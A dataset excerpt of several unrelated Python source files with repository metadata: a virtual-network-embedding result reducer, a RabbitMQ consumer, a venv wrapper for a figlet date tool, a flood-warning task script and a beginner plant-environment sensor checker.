logger.info(\".. Reducing results of algorithm {}\".format(algorithm))\n ssd_reduced[algorithm] = {}\n for scenario_id in ssd[algorithm].keys():\n logger.info(\" .. handling scenario {}\".format(scenario_id))\n ssd_reduced[algorithm][scenario_id] = {}\n for exec_id in ssd[algorithm][scenario_id].keys():\n ssd_reduced[algorithm][scenario_id][exec_id] = {}\n params, scenario = scenario_solution_storage.scenario_parameter_container.scenario_triple[scenario_id]\n solution_collection = ssd[algorithm][scenario_id][exec_id].get_solution()\n for vine_settings, result_list in solution_collection.iteritems():\n ssd_reduced[algorithm][scenario_id][exec_id][vine_settings] = []\n number_of_req_profit = 0\n for req in scenario.requests:\n if req.profit > 0.001:\n number_of_req_profit += 1\n number_of_requests = len(scenario.requests)\n\n max_node_load_vals = np.zeros(len(result_list))\n max_edge_load_vals = np.zeros(len(result_list))\n total_runtime_vals = np.zeros(len(result_list))\n profit_vals = np.zeros(len(result_list))\n\n num_edge_mapping_failed = 0\n num_initial_lp_failed = 0\n num_node_mapping_failed = 0\n\n runtimes_per_request_vals = []\n for (result_index, result) in result_list:\n assert isinstance(result, vine.OfflineViNEResult)\n solution_object = result.get_solution()\n mappings = solution_object.request_mapping\n\n load = _initialize_load_dict(scenario)\n for req in scenario.requests:\n runtimes_per_request_vals.append(\n result.runtime_per_request[req]\n )\n req_mapping = mappings[req]\n if req_mapping is not None and req_mapping.is_embedded:\n profit_vals[result_index] += req.profit\n _compute_mapping_load(load, req, req_mapping)\n\n edge_mapping_failed, lp_failed, is_embedded, node_mapping_failed = self._count_mapping_status(result)\n num_edge_mapping_failed += edge_mapping_failed\n num_initial_lp_failed += lp_failed\n num_node_mapping_failed += node_mapping_failed\n\n max_edge_load, max_node_load = get_max_node_and_edge_load(load, scenario.substrate)\n max_node_load_vals[result_index] = max_node_load\n max_edge_load_vals[result_index] = max_edge_load\n total_runtime_vals[result_index] = result.total_runtime\n\n reduced = ReducedOfflineViNEResultCollection(\n max_node_load=get_aggregated_data(max_node_load_vals),\n max_edge_load=get_aggregated_data(max_edge_load_vals),\n total_runtime=get_aggregated_data(total_runtime_vals),\n profit=get_aggregated_data(profit_vals),\n runtime_per_request=get_aggregated_data(runtimes_per_request_vals),\n num_initial_lp_failed=num_initial_lp_failed,\n 
num_node_mapping_failed=num_node_mapping_failed,\n num_edge_mapping_failed=num_edge_mapping_failed,\n num_req_with_profit=number_of_req_profit,\n original_number_requests=number_of_requests\n )\n ssd_reduced[algorithm][scenario_id][exec_id][vine_settings].append(reduced)\n del scenario_solution_storage.scenario_parameter_container.scenario_list\n del scenario_solution_storage.scenario_parameter_container.scenario_triple\n scenario_solution_storage.algorithm_scenario_solution_dictionary = ssd_reduced\n\n logger.info(\"Writing result pickle to {}\".format(reduced_baseline_solutions_output_pickle_path))\n with open(reduced_baseline_solutions_output_pickle_path, \"wb\") as f:\n pickle.dump(scenario_solution_storage, f)\n logger.info(\"All done.\")\n return scenario_solution_storage\n\n def _count_mapping_status(self, vine_result):\n assert isinstance(vine_result, vine.OfflineViNEResult)\n num_is_embedded = 0\n num_initial_lp_failed = 0\n num_node_mapping_failed = 0\n num_edge_mapping_failed = 0\n for status in vine_result.mapping_status_per_request.values():\n if status == vine.ViNEMappingStatus.is_embedded:\n num_is_embedded += 1\n elif status == vine.ViNEMappingStatus.initial_lp_failed:\n num_initial_lp_failed += 1\n elif status == vine.ViNEMappingStatus.node_mapping_failed:\n num_node_mapping_failed += 1\n elif status == vine.ViNEMappingStatus.edge_mapping_failed:\n num_edge_mapping_failed += 1\n else:\n raise ValueError(\"Unexpected mapping status!\")\n return num_edge_mapping_failed, num_initial_lp_failed, num_is_embedded, num_node_mapping_failed\n\n\nclass RandRoundSepLPOptDynVMPCollectionResultReducer(object):\n\n def __init__(self):\n pass\n\n def reduce_randround_result_collection(self,\n randround_solutions_input_pickle_name,\n reduced_randround_solutions_output_pickle_name=None):\n\n randround_solutions_input_pickle_path = os.path.join(util.ExperimentPathHandler.INPUT_DIR,\n randround_solutions_input_pickle_name)\n\n if reduced_randround_solutions_output_pickle_name is None:\n file_basename = os.path.basename(randround_solutions_input_pickle_path).split(\".\")[0]\n reduced_randround_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n file_basename + \"_reduced.pickle\")\n else:\n reduced_randround_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n randround_solutions_input_pickle_name)\n\n logger.info(\"\\nWill read from ..\\n\\t{} \\n\\t\\tand store reduced data into\\n\\t{}\\n\".format(\n randround_solutions_input_pickle_path, reduced_randround_solutions_output_pickle_path))\n\n logger.info(\"Reading pickle file at {}\".format(randround_solutions_input_pickle_path))\n with open(randround_solutions_input_pickle_path, \"rb\") as f:\n sss = pickle.load(f)\n\n sss.scenario_parameter_container.scenario_list = None\n sss.scenario_parameter_container.scenario_triple = None\n\n for alg, scenario_solution_dict in sss.algorithm_scenario_solution_dictionary.iteritems():\n logger.info(\".. Reducing results of algorithm {}\".format(alg))\n for sc_id, ex_param_solution_dict in scenario_solution_dict.iteritems():\n logger.info(\" .. 
handling scenario {}\".format(sc_id))\n for ex_id, solution in ex_param_solution_dict.iteritems():\n compressed = self.reduce_single_solution(solution)\n ex_param_solution_dict[ex_id] = compressed\n\n logger.info(\"Writing result pickle to {}\".format(reduced_randround_solutions_output_pickle_path))\n with open(reduced_randround_solutions_output_pickle_path, \"w\") as f:\n pickle.dump(sss, f)\n logger.info(\"All done.\")\n return sss\n\n def reduce_single_solution(self, solution):\n if solution is None:\n return None\n assert isinstance(solution, treewidth_model.RandRoundSepLPOptDynVMPCollectionResult)\n\n max_node_loads = {}\n max_edge_loads = {}\n rounding_runtimes = {}\n profits = {}\n\n for algorithm_sub_parameters, rounding_result_list in solution.solutions.items():\n max_node_loads[algorithm_sub_parameters] = []\n max_edge_loads[algorithm_sub_parameters] = []\n rounding_runtimes[algorithm_sub_parameters] = []\n profits[algorithm_sub_parameters] = []\n\n for rounding_result in rounding_result_list:\n max_node_loads[algorithm_sub_parameters].append(rounding_result.max_node_load)\n max_edge_loads[algorithm_sub_parameters].append(rounding_result.max_edge_load)\n rounding_runtimes[algorithm_sub_parameters].append(rounding_result.time_to_round_solution)\n profits[algorithm_sub_parameters].append(rounding_result.profit)\n\n for algorithm_sub_parameters in solution.solutions.keys():\n max_node_loads[algorithm_sub_parameters] = get_aggregated_data(max_node_loads[algorithm_sub_parameters])\n max_edge_loads[algorithm_sub_parameters] = get_aggregated_data(max_edge_loads[algorithm_sub_parameters])\n rounding_runtimes[algorithm_sub_parameters] = get_aggregated_data(rounding_runtimes[algorithm_sub_parameters])\n profits[algorithm_sub_parameters] = get_aggregated_data(profits[algorithm_sub_parameters])\n\n assert isinstance(solution.lp_computation_information, treewidth_model.SeparationLPSolution)\n # TODO Check which information is actually of interest\n # TODO Some of the data can be reduced further (store only mean and std. 
dev.)\n\n solution = ReducedRandRoundSepLPOptDynVMPCollectionResult(\n lp_time_preprocess=solution.lp_computation_information.time_preprocessing,\n lp_time_tree_decomposition=get_aggregated_data(solution.lp_computation_information.tree_decomp_runtimes),\n lp_time_dynvmp_initialization=get_aggregated_data(solution.lp_computation_information.dynvmp_init_runtimes),\n lp_time_dynvmp_computation=[get_aggregated_data(values) for values in solution.lp_computation_information.dynvmp_computation_runtimes],\n lp_time_gurobi_optimization=get_aggregated_data(solution.lp_computation_information.gurobi_runtimes),\n lp_time_optimization=solution.lp_computation_information.time_optimization,\n lp_status=solution.lp_computation_information.status,\n lp_profit=solution.lp_computation_information.profit,\n lp_generated_columns=solution.lp_computation_information.number_of_generated_mappings,\n max_node_loads=max_node_loads,\n max_edge_loads=max_edge_loads,\n rounding_runtimes=rounding_runtimes,\n profits=profits,\n )\n return solution\n\n\ndef _initialize_load_dict(scenario):\n load = dict([((u, v), 0.0) for (u, v) in scenario.substrate.edges])\n for u in scenario.substrate.nodes:\n for t in scenario.substrate.node[u]['supported_types']:\n load[(t, u)] = 0.0\n return load\n\n\ndef _compute_mapping_load(load, req, req_mapping):\n for i, u in req_mapping.mapping_nodes.iteritems():\n node_demand = req.get_node_demand(i)\n load[(req.get_type(i), u)] += node_demand\n\n if isinstance(req_mapping, solutions.Mapping):\n _compute_mapping_edge_load_unsplittable(load, req, req_mapping)\n elif isinstance(req_mapping, vine.SplittableMapping):\n _compute_mapping_edge_load_splittable(load, req, req_mapping)\n return load\n\n\ndef _compute_mapping_edge_load_unsplittable(load, req, req_mapping):\n for ij, sedge_list in req_mapping.mapping_edges.iteritems():\n edge_demand = req.get_edge_demand(ij)\n for uv in sedge_list:\n load[uv] += edge_demand\n\n\ndef _compute_mapping_edge_load_splittable(load, req, req_mapping):\n for ij, edge_vars_dict in req_mapping.mapping_edges.iteritems():\n edge_demand = req.get_edge_demand(ij)\n for uv, x in edge_vars_dict.items():\n load[uv] += edge_demand * x\n\n\ndef get_max_node_and_edge_load(load_dict, substrate):\n max_node_load = 0\n max_edge_load = 0\n for resource, value in load_dict.iteritems():\n x, y = resource\n if resource in substrate.edges:\n max_edge_load = max(max_edge_load, value)\n elif x in substrate.get_types() and y in substrate.nodes:\n max_node_load = max(max_node_load, value)\n else:\n raise ValueError(\"Invalid resource {}\".format(resource))\n return max_edge_load, max_node_load\n","repo_name":"vnep-approx/evaluation-acm-ccr-2019","sub_path":"evaluation_acm_ccr_2019/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":16651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"38206676376","text":"import pika,os,sys\nimport time\n\ndef main():\n credentials = pika.PlainCredentials(\"guest\", \"guest\")\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credentials))\n channel = connection.channel()\n channel.queue_declare(queue=\"hello1\",durable=True)#he durability options let the tasks survive even if RabbitMQ is restarted.\n\n # def callback(ch,method,properties,body):\n # print(\" [x] Received %r\" % body)\n def callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body.decode())\n time.sleep(body.count(b'.'))\n print(\" [x] 
Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)#Manual ack auto_ack needs to be False\n\n channel.basic_qos(prefetch_count=1)#not to give more than one message to a worker at a time. Or, in other words, don't dispatch a new message to a worker until it has processed and acknowledged the previous one.\n channel.basic_consume(queue=\"hello1\",on_message_callback=callback, auto_ack=False)\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n","repo_name":"RajpootPratima/RabbitMQ-with-Python","sub_path":"receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19983599556","text":"import venv, sys, shutil, os\nfrom subprocess import run\nfrom contextlib import redirect_stderr, redirect_stdout\n\n\ndef create_venv(directory: str):\n venv.create(directory, with_pip=True)\n\n\ndef install_figlet(venv_directory: str):\n with open('/tmp/help.txt', 'w') as std_out:\n run([f'{venv_directory}/bin/pip', 'install', 'pyfiglet'], stdout=std_out)\n os.remove('/tmp/help.txt')\n\n\ndef run_figdate(venv_directory: str, args: list):\n run([f'{venv_directory}/bin/python3', '-m', 'figdate'] + args)\n\n\nif __name__ == '__main__':\n venv_dir = '/tmp/venv_02_pushpip'\n create_venv(venv_dir)\n install_figlet(venv_dir)\n run_figdate(venv_dir, sys.argv[1:])\n shutil.rmtree(venv_dir)","repo_name":"BondarevIvan/python-development22","sub_path":"02_PushPip/figdate_wrapper.py","file_name":"figdate_wrapper.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72547433094","text":"# This is the file for writing the testing programs of Task2B\n\n\nfrom floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.flood import stations_level_over_threshold\n\n\ndef run():\n # Build list of stations\n stations = build_station_list()\n # Update the current water levels in the station objects\n update_water_levels(stations)\n\n threshold = 0.8\n # Get the list of stations over the relative water level threshold\n over_threshold = stations_level_over_threshold(stations, threshold)\n\n # Iterate through each station in the output list and print in the correct format\n for entry in over_threshold:\n print(f\"{entry[0].name} {entry[1]}\")\n\n\nif __name__ == \"__main__\":\n print(\"*** Task 2B: CUED Part IA Flood Warning System ***\")\n run()\n","repo_name":"TimHire/Ia-flood-risk","sub_path":"Task2B.py","file_name":"Task2B.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29805195747","text":"import xml.etree.ElementTree as ET\nimport showLogData\n\ntemp_high = 0\ntemp_low = 0\nwind_high = 0\nwind_low = 0\nwind_nat = \"\"\nwind_acid_co2_min = 0\nwind_acid_co2_high = 0\nwind_acid_HCLO3_min = 0\nwind_acid_HCLO3_high = 0\nwind_base_min = 0\nwind_base_max = 0\nwind_toxic_co_min = 0\nwind_toxic_co_high = 0\nAH_high = 0\nAH_low = 0\nRH_high = 0\nRH_low = 0\nSOIL_M_MIN = 0\nSOIL_M_MAX = 0\nPH_top = 0\nPH_bottom = 0\nintencity_top = 0\nintencity_bottom = 0\nUV_top = 0\nUV_bottom = 0\nIR_top = 0\nIR_bottom = 0\n\nclass whetherAnalysis:\n\tprint(\"whetherAnalysis\")\n\t# temprature = 
[]\n\ttemprature = 0\n\twind = 0\n\twind_direction = 0\n\thumidity = 0\n\tsoileMoisture = 0\n\twind_content = \"\"\n\n\tdef __init__(_temp, _wind_s, _wind_dir, _wind_co2, _wind_clo3, _wind_base, _wind_co, A_hue, R_hue, _soil, _ph, _intensity, _uv, _ir):\n\t\tprint(\"__init__\")\n\t\ttemprature = _temp\n\t\t\n\t\tA_humidity = A_hue\n\t\tR_humidity = R_hue\n\n\t\tsoileMoisture = _soil\n\n\t\twind = _wind_s\n\t\twind_nat = _wind_dir\n\t\twind_co2 = _wind_co2\n\t\twind_clo3 = _wind_clo3\n\t\twind_base = _wind_base\n\t\twind_co = _wind_co\n\n\t\tph_level = _ph\n\n\t\tintensity_level = _intensity\n\t\tUV_level = _uv\n\t\tIR_level = _ir\n\t\tprint(intensity_level)\n\t\tprint(UV_level)\n\t\tprint(IR_level)\n\n\t\tprint(temprature)\n\t\tprint(wind)\n\t\tprint(A_humidity)\n\t\tprint(R_humidity)\n\n\t\tprint(soileMoisture)\n\n\t\tpath = \"E:\\\\ZZZZZ\\\\FIT\\\\suwa project\\\\demoFlower.xml\"\n\t\ttree = ET.parse(path)\n\t\troot = tree.getroot()\n\n\t\tfor child in root:\n\t\t\tprint(child.tag)\n\n\t\tfull_xml_data = ET.tostring(root, encoding='utf8').decode('utf8')\n\t\tprint(full_xml_data)\n\n\t\twhetherAnalysis.getFlowerXML_Data()\n\t\twhetherAnalysis.tempratureAnalysis(temprature)\n\t\twhetherAnalysis.windAnalysis(wind, wind_nat, wind_co2, wind_clo3, wind_base, wind_co)\n\t\twhetherAnalysis.humidityAnalysis(A_humidity, R_humidity)\n\t\twhetherAnalysis.soileMoistureAnalysis(soileMoisture)\n\t\twhetherAnalysis.phAnalysis(ph_level)\n\t\twhetherAnalysis.intensityAnalysis(intensity_level, UV_level, IR_level)\n\n\n\n\tdef tempratureAnalysis(temprature):\n\t\tprint(\"tempratureAnalysis\", temprature)\n\t\t# get ranges from xml\n\t\t# 1 read xml val\n\t\tglobal temp_high\n\t\tglobal temp_low\n\n\t\ttry:\n\t\t\tif(temp_high == temprature or temp_high > temprature):\n\t\t\t\tbTempHigh = True\n\t\t\t\n\t\t\tif(temp_low == temprature or temp_low < temprature):\n\t\t\t\tbTempLow = True\n\n\t\t\tif(bTempHigh == True & bTempLow == True):\n\t\t\t\t# Print on the log\n\t\t\t\tshowLogData.printLogData(\"THE TEMPRATURE \"+str(temprature)+\"'C IS SUITABLE FOR PLANT\")\n\t\t\telif(bTempHigh == False | bTempLow == False):\n\t\t\t\tshowLogData.printLogData(\"THE TEMPRATURE \"+str(temprature)+\"'C IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\t\telse:\n\t\t\t\tshowLogData.printLogData(\"TEMPRATURE NOT HAS BEEN DEFINED\")\n\t\texcept:\n\t\t\tshowLogData.printLogData(\"TEMPRATURE CAPTURE FALURE\")\n\n\n\n\tdef windAnalysis(wind_speed, wind_nature, co2_level, hclo3_level, sope_water_level, co_level):\n\t\tglobal wind_high\n\t\tglobal wind_low\n\n\t\tglobal wind_nat\n\n\t\tglobal wind_acid_co2_min\n\t\tglobal wind_acid_co2_high\n\n\t\tglobal wind_acid_HCLO3_min\n\t\tglobal wind_acid_HCLO3_high\n\n\t\tglobal wind_base_min\n\t\tglobal wind_base_max\n\n\t\tglobal wind_toxic_co_min\n\t\tglobal wind_toxic_co_high\n\n\t\t# wind_speed\n\t\tbWindHigh = False\n\t\tbWindLow = False\n\t\tif(wind_high == wind_speed or wind_high > wind_speed):\n\t\t\tbWindHigh = True\n\t\t\t\n\t\tif(wind_low == wind_speed or wind_low < wind_speed):\n\t\t\tbWindLow = True\n\n\t\tif(bWindHigh == True & bWindLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(wind_speed)+\" km h^-1 OF WIND SPEED IS SUITABLE FOR PLANT\")\n\t\telif(bWindHigh == False or bWindLow == False):\n\t\t\tshowLogData.printLogData(str(wind_speed)+\" km h^-1 OF WIND SPEED IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WIND SPEED NOT HAS BEEN DEFINED\")\n\n\t\t# wind_nature\n\t\tif(wind_nature == wind_nat):\n\t\t\t# Print on the 
log\n\t\t\tshowLogData.printLogData(\"WIND NATURE : \"+wind_nature+\", STATUS : OK\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WIND NATURE : \"+wind_nature+\", STATUS : NOT OK\")\n\n\t\t# co2_level\n\t\tbco2_levelHigh = False\n\t\tbco2_levelLow = False\n\t\tif(wind_acid_co2_high == co2_level or wind_acid_co2_high > co2_level):\n\t\t\tbco2_levelHigh = True\n\t\t\t\n\t\tif(wind_acid_co2_min == co2_level or wind_acid_co2_min < co2_level):\n\t\t\tbco2_levelLow = True\n\n\t\tif(bco2_levelHigh == True & bco2_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(co2_level)+\"g m^-3 OF CO2 IS SUITABLE FOR PLANT\")\n\t\telif(bco2_levelHigh == False or bco2_levelLow == False):\n\t\t\tshowLogData.printLogData(str(co2_level)+\"g m^-3 OF CO2 IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"CO2 LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# hclo3_level\n\t\tbHCLO3_levelHigh = False\n\t\tbHCLO3_levelLow = False\n\t\tif(wind_acid_HCLO3_high == hclo3_level or wind_acid_HCLO3_high > hclo3_level):\n\t\t\tbHCLO3_levelHigh = True\n\t\t\t\n\t\tif(wind_acid_HCLO3_min == hclo3_level or wind_acid_HCLO3_min < hclo3_level):\n\t\t\tbHCLO3_levelLow = True\n\n\t\tif(bHCLO3_levelHigh == True & bHCLO3_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(hclo3_level)+\"g m^-3 OF HCLO3 IS SUITABLE FOR PLANT\")\n\t\telif(bHCLO3_levelHigh == False or bHCLO3_levelLow == False):\n\t\t\tshowLogData.printLogData(str(hclo3_level)+\"g m^-3 OF HCLO3 IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"HCLO3 VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# sope_water_level\n\t\tbSOPE_levelHigh = False\n\t\tbSOPE_levelLow = False\n\t\tif(wind_base_max == sope_water_level or wind_base_max > sope_water_level):\n\t\t\tbSOPE_levelHigh = True\n\t\t\t\n\t\tif(wind_base_min == sope_water_level or wind_base_min < sope_water_level):\n\t\t\tbSOPE_levelLow = True\n\n\t\tif(bSOPE_levelHigh == True & bSOPE_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(sope_water_level)+\"g m^-3 OF SOAP VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bSOPE_levelHigh == False or bSOPE_levelLow == False):\n\t\t\tshowLogData.printLogData(str(sope_water_level)+\"g m^-3 OF SOAP VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"SOAP VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# co_level\n\t\tbCO_levelHigh = False\n\t\tbCO_levelLow = False\n\t\tif(wind_toxic_co_high == co_level or wind_toxic_co_high > co_level):\n\t\t\tbCO_levelHigh = True\n\t\t\t\n\t\tif(wind_toxic_co_min == co_level or wind_toxic_co_min < co_level):\n\t\t\tbCO_levelLow = True\n\n\t\tif(bCO_levelHigh == True & bCO_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(co_level)+\"g m^-3 OF CO IS SUITABLE FOR PLANT\")\n\t\telif(bCO_levelHigh == False or bCO_levelLow == False):\n\t\t\tshowLogData.printLogData(str(co_level)+\"g m^-3 OF CO IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"CO AMOUNT NOT HAS BEEN DEFINED\")\n\n\n\tdef humidityAnalysis(A_humidity, R_humidity):\n\n\t\tglobal AH_high\n\t\tglobal AH_low\n\t\tglobal RH_high\n\t\tglobal RH_low\n\n\t\t# A_humidity\n\t\tbAHumidity_levelHigh = False\n\t\tbAHumidity_levelLow = False\n\t\tif(AH_high == A_humidity or AH_high > A_humidity):\n\t\t\tbAHumidity_levelHigh = True\n\t\t\t\n\t\tif(AH_low == A_humidity or AH_low < A_humidity):\n\t\t\tbAHumidity_levelLow = True\n\n\t\tif(bAHumidity_levelHigh == True & 
bAHumidity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(A_humidity)+\"g m^-3 OF WATER VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bAHumidity_levelHigh == False or bAHumidity_levelLow == False):\n\t\t\tshowLogData.printLogData(str(A_humidity)+\"g m^-3 OF WATER VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WATER VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# R_humidity\n\t\tbRHumidity_levelHigh = False\n\t\tbRHumidity_levelLow = False\n\t\tif(RH_high == R_humidity or RH_high > R_humidity):\n\t\t\tbRHumidity_levelHigh = True\n\t\t\t\n\t\tif(RH_low == R_humidity or RH_low < R_humidity):\n\t\t\tbRHumidity_levelLow = True\n\t\t\n\t\tif(bRHumidity_levelHigh == True & bRHumidity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(R_humidity)+\"g m^-3 OF WATER VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bRHumidity_levelHigh == False or bRHumidity_levelLow == False):\n\t\t\tshowLogData.printLogData(str(R_humidity)+\"g m^-3 OF WATER VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WATER VAPOUR PERCENTAGE NOT HAS BEEN DEFINED\")\n\n\n\tdef soileMoistureAnalysis(soileMoisture):\n\t\tglobal SOIL_M_MIN\n\t\tglobal SOIL_M_MAX\n\n\t\t# soileMoisture\n\t\tbSoil_levelHigh = False\n\t\tbSoil_levelLow = False\n\t\tif(SOIL_M_MAX == soileMoisture or SOIL_M_MAX > soileMoisture):\n\t\t\tbSoil_levelHigh = True\n\t\t\t\n\t\tif(SOIL_M_MIN == soileMoisture or SOIL_M_MIN < soileMoisture):\n\t\t\tbSoil_levelLow = True\n\n\t\tif(bSoil_levelHigh == True & bSoil_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(soileMoisture)+\"g kg^-1 OF SOILE MOISTURE IS SUITABLE FOR PLANT\")\n\t\telif(bSoil_levelHigh == False or bSoil_levelLow == False):\n\t\t\tshowLogData.printLogData(str(soileMoisture)+\"g kg^-1 OF SOILE MOISTURE IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"SOILE MOISTURE AMOUNT NOT HAS BEEN DEFINED\")\n\n\tdef phAnalysis(ph_level):\n\t\tglobal PH_top\n\t\tglobal PH_bottom\n\n\t\t# ph_level\n\t\tbPH_levelHigh = False\n\t\tbPH_levelLow = False\n\t\tif(PH_top == ph_level or PH_top > ph_level):\n\t\t\tbPH_levelHigh = True\n\t\t\t\n\t\tif(PH_bottom == ph_level or PH_bottom < ph_level):\n\t\t\tbPH_levelLow = True\n\n\t\tif(bPH_levelHigh == True & bPH_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(ph_level)+\" OF ph LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bPH_levelHigh == False or bPH_levelLow == False):\n\t\t\tshowLogData.printLogData(str(ph_level)+\" OF ph LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"ph LEVEL NOT HAS BEEN DEFINED\")\n\n\tdef intensityAnalysis(intensity_C, UV_C, IR_C):\n\t\tglobal intencity_top\n\t\tglobal intencity_bottom\n\t\tglobal UV_top\n\t\tglobal UV_bottom\n\t\tglobal IR_top\n\t\tglobal IR_bottom\n\n\t\t# intensity_C\n\t\tbIntensity_levelHigh = False\n\t\tbIntensity_levelLow = False\n\t\tif(intencity_top == intensity_C or intencity_top > intensity_C):\n\t\t\tbIntensity_levelHigh = True\n\t\t\t\n\t\tif(intencity_bottom == intensity_C or intencity_bottom < intensity_C):\n\t\t\tbIntensity_levelLow = True\n\n\t\tif(bIntensity_levelHigh == True & bIntensity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(intensity_C)+\" W m^-2 OF INTENCITY LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bIntensity_levelHigh == False or bIntensity_levelLow == 
False):\n\t\t\tshowLogData.printLogData(str(intensity_C)+\" W m^-2 OF INTENCITY LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"INTENCITY LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# UV_C\n\t\tbUV_levelHigh = False\n\t\tbUV_levelLow = False\n\t\tif(UV_top == UV_C or UV_top > UV_C):\n\t\t\tbUV_levelHigh = True\n\t\t\t\n\t\tif(UV_bottom == UV_C or UV_bottom < UV_C):\n\t\t\tbUV_levelLow = True\n\n\t\tif(bUV_levelHigh == True & bUV_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(UV_C)+\" W m^-2 OF UV LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bUV_levelHigh == False or bUV_levelLow == False):\n\t\t\tshowLogData.printLogData(str(UV_C)+\" W m^-2 OF UV LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"UV LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# IR_C\n\t\tbIR_levelHigh = False\n\t\tbIR_levelLow = False\n\t\tif(IR_top == IR_C or IR_top > IR_C):\n\t\t\tbIR_levelHigh = True\n\t\t\t\n\t\tif(IR_bottom == IR_C or IR_bottom < IR_C):\n\t\t\tbIR_levelLow = True\n\n\t\tif(bIR_levelHigh == True & bIR_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(IR_C)+\" W m^-2 OF IR LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bIR_levelHigh == False or bIR_levelLow == False):\n\t\t\tshowLogData.printLogData(str(IR_C)+\" W m^-2 OF IR LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"IR LEVEL NOT HAS BEEN DEFINED\")\n\n\tdef getFlowerXML_Data():\n\t\tglobal temp_high\n\t\tglobal temp_low\n\t\tglobal wind_high\n\t\tglobal wind_low\n\t\tglobal wind_nat\n\t\tglobal wind_acid_co2_min\n\t\tglobal wind_acid_co2_high\n\t\tglobal wind_acid_HCLO3_min\n\t\tglobal wind_acid_HCLO3_high\n\t\tglobal wind_base_min\n\t\tglobal wind_base_max\n\t\tglobal wind_toxic_co_min\n\t\tglobal wind_toxic_co_high\n\t\tglobal AH_high\n\t\tglobal AH_low\n\t\tglobal RH_high\n\t\tglobal RH_low\n\t\tglobal SOIL_M_MIN\n\t\tglobal SOIL_M_MAX\n\t\tglobal PH_top\n\t\tglobal PH_bottom\n\t\tglobal intencity_top\n\t\tglobal intencity_bottom\n\t\tglobal UV_top\n\t\tglobal UV_bottom\n\t\tglobal IR_top\n\t\tglobal IR_bottom\n\n\t\t# get path\n\t\tpath = \"E:\\\\ZZZZZ\\\\FIT\\\\suwa project\\\\demoFlower.xml\"\n\t\ttree = ET.parse(path)\n\t\troot = tree.getroot()\n\n\t\tfor temp in root.iter('TEMPRATURE'):\n\t\t\ttemp_high = float(temp.find('HIGH').text)\n\t\t\ttemp_low = float(temp.find('LOW').text)\n\n\t\tfor temp in root.iter('WIND'):\n\t\t\twind_high = 